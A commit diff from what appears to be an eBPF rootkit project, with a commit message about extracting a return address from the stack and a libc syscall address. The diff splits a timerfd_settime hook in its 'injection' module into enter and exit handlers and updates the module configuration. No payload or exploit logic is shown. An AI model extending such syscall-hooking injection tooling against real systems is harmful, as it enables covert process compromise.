Finished extraction of return address from the stack, and libc syscall adress

src/user/include/modules/injection.h

@@ -8,28 +8,42 @@
 #include "common.h"
 
 //Connections
-int attach_sys_timerfd_settime(struct kit_bpf *skel){
+int attach_sys_enter_timerfd_settime(struct kit_bpf *skel){
     //skel->links.kprobe_sys_geteuid = bpf_program__attach_uprobe(skel->progs.uprobe_execute_command, false, -1, "/home/osboxes/TFG/src/helpers/execve_hijack", 4992);
-	skel->links.sys_timerfd_settime = bpf_program__attach(skel->progs.sys_timerfd_settime);
-    return libbpf_get_error(skel->links.sys_timerfd_settime);
+	skel->links.sys_enter_timerfd_settime = bpf_program__attach(skel->progs.sys_enter_timerfd_settime);
+    return libbpf_get_error(skel->links.sys_enter_timerfd_settime);
+}
+int attach_sys_exit_timerfd_settime(struct kit_bpf *skel){
+	skel->links.sys_exit_timerfd_settime = bpf_program__attach(skel->progs.sys_exit_timerfd_settime);
+    return libbpf_get_error(skel->links.sys_exit_timerfd_settime);
 }
 
 int attach_injection_all(struct kit_bpf *skel){
-    return attach_sys_timerfd_settime(skel);
+    return attach_sys_enter_timerfd_settime(skel)
+        || attach_sys_exit_timerfd_settime(skel);;
 }
 
 
-int detach_sys_timerfd_settime(struct kit_bpf *skel){
-    int err = detach_link_generic(skel->links.sys_timerfd_settime);
+int detach_sys_enter_timerfd_settime(struct kit_bpf *skel){
+    int err = detach_link_generic(skel->links.sys_enter_timerfd_settime);
     if(err<0){
-        fprintf(stderr, "Failed to detach fs link\n");
+        fprintf(stderr, "Failed to detach injection link\n");
+        return -1;
+    }
+    return 0;
+}
+int detach_sys_exit_timerfd_settime(struct kit_bpf *skel){
+    int err = detach_link_generic(skel->links.sys_exit_timerfd_settime);
+    if(err<0){
+        fprintf(stderr, "Failed to detach injection link\n");
         return -1;
     }
     return 0;
 }
 
 int detach_injection_all(struct kit_bpf *skel){
-    return detach_sys_timerfd_settime(skel);
+    return detach_sys_enter_timerfd_settime(skel)
+        || detach_sys_exit_timerfd_settime(skel);
 }
 
 #endif

src/user/include/modules/module_manager.c

@@ -26,7 +26,8 @@ module_config_t module_config = {
     },
     .injection_module = {
         .all = ON,
-        .sys_timerfd_settime = OFF
+        .sys_enter_timerfd_settime = OFF,
+        .sys_exit_timerfd_settime = OFF
     }
 
 };
@@ -88,7 +89,8 @@ int setup_all_modules(){
     if(config.injection_module.all == ON){
         ret = attach_injection_all(attr.skel);
     }else{
-        if(config.injection_module.sys_timerfd_settime == ON) ret = attach_sys_timerfd_settime(attr.skel);
+        if(config.injection_module.sys_enter_timerfd_settime == ON) ret = attach_sys_enter_timerfd_settime(attr.skel);
+        if(config.injection_module.sys_exit_timerfd_settime == ON) ret = attach_sys_exit_timerfd_settime(attr.skel);
     }
     if(ret!=0) return -1;
 

src/user/include/modules/module_manager.h

@@ -37,7 +37,8 @@ typedef struct module_config_t{
 
     struct injection_module {
         char all;
-        char sys_timerfd_settime;
+        char sys_enter_timerfd_settime;
+        char sys_exit_timerfd_settime;
     }injection_module;
 
 } module_config_t;